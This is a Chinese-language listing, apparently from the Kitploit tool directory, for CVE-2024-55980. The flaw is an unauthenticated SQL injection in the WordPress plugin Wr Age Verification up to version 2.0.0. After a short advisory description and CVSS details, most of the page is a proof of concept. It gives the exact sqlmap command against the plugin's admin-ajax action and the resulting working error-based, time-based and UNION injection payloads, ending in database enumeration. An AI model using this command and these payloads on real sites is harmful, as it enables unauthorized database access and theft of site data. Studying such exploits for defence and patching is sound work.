Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-55980 — Wr Age Verification <= 2.0.0 - 未认证的SQL注入 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2024-55980
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育精选资源
GitHubrandomrobbiebf/cve-2024-55980

CVE-2024-55980

Wr Age Verification <= 2.0.0 - 未认证的SQL注入

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-55980

Wr Age Verification <= 2.0.0 - 未认证的 SQL 注入

描述

WordPress 的 Wr Age Verification 插件在 2.0.0 及之前的所有版本中存在 SQL 注入漏洞,原因是对用户提供的参数转义不足,且对现有 SQL 查询缺乏充分的预处理。这使得未认证的攻击者能够将额外的 SQL 查询附加到现有查询中,从而提取数据库中的敏感信息。

详情

  • 类型:插件
  • Slug:wr-age-verification
  • 受影响版本:2.0.0
  • CVSS 分数:7.5
  • CVSS 评级:高危
  • CVSS 向量:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE:CVE-2024-55980
  • 状态:已修复

POC

root@kitploit:~
sqlmap.py -u "https://wp-dev.ddev.site:443/wp-admin/admin-ajax.php" --data="action=get_state&id=uk" --level 2 --risk 2 --dbms mysql -dbs -p id
root@kitploit:~
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1839 HTTP(s) requests:
---
Parameter: id (POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: action=get_state&id=-4023 OR 1 GROUP BY CONCAT(0x71626a7071,(SELECT (CASE WHEN (5717=5717) THEN 1 ELSE 0 END)),0x716b767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: action=get_state&id=(CASE WHEN (4695=4695) THEN SLEEP(5) ELSE 4695 END)

    Type: UNION query
    Title: MySQL UNION query (random number) - 9 columns
    Payload: action=get_state&id=-4877 UNION ALL SELECT 4325,4325,4325,4325,4325,4325,4325,4325,CONCAT(0x71626a7071,0x766a504d7043656b517443675871505768496c43747a7666764d70506d55785067764e45524f6647,0x716b767071)#
---
[11:15:23] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[11:15:23] [INFO] fetching database names
available databases [3]:
[*] db
[*] information_schema
[*] test

下载工具